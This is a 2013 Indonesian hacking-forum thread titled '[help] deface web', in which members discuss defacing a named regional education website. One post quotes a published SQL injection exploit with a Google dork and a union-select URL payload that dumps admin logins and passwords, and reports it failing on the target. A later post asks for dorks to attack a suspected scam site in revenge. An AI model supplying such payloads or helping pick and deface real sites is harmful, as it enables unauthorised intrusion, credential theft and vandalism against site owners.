Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[help] deface web.

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Re: [help] deface web.

Postby abdurrahimi » Thu Mar 14, 2013 5:28 pm

wonglemu wrote:
bhuyunk wrote:Jangan Site Pendidikan lah gan......
:oops: :oops: :oops:


balonimia wrote:iya jgn punya indo juga -___-


ane setuju ma yg di atas,, klo bisa web yg lain aja

iya banget tuh gan... setuju ama rrekan2 apalagi itu padang gan padang kota tercinta/.... :oops:
abdurrahimi
 
Posts: 3
Joined: Sun Mar 10, 2013 6:13 pm

Re: [help] deface web.

Postby anharku » Fri Mar 15, 2013 10:26 pm

kalo dilihat2 itu web pakai
Design by CSS Templates For Free
http://www.csstemplatesforfree.com
==========
xpl yg berkaitan hanya :

# Exploit Title:Sitename. Design by CSS-Free-Templates Sql I ((|))
# Sql Injection Vulnerability ((|))
# Google Dork: inurl:"Sitename. Design by CSS-Free-Templates" #
# Exploit Author: Ashiyane Digital Security Team #
# Category: Web Application #
# Tested on: Windows 7


http://XXXX/list.php?pagenum=0&categoryid=-1923+union%20select+1,group_concat%28login,0x3a,password%29%20from+admin_
login
=================
namun itu pun saya coba ga work..
sepertinya http://psb.diknaspadang.or.id/ pakai clean URL jadi URL nya dah ga ada ekstensinya
misal
http://psb.diknaspadang.or.id/admin/login/
bukan ke
http://psb.diknaspadang.or.id/admin/login.php

http://psb.diknaspadang.or.id/admin/login/gagal
bukan ke
http://psb.diknaspadang.or.id/admin/login/gagal.php

dan web itu ga vuln SQLi :(

sumber: http://cxsecurity.com/issue/WLB-2013020143
User avatar
anharku
 
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: [help] deface web.

Postby qito » Thu Apr 25, 2013 3:01 pm

Bantu cari Dork buat web Penipuan ini ghan...
Biar jera deh yang empunya web...

http://hadiahxl-ku.jimdo.com/
qito
 
Posts: 2
Joined: Sun Aug 22, 2010 5:58 am

leave a comment

Previous

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 6 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id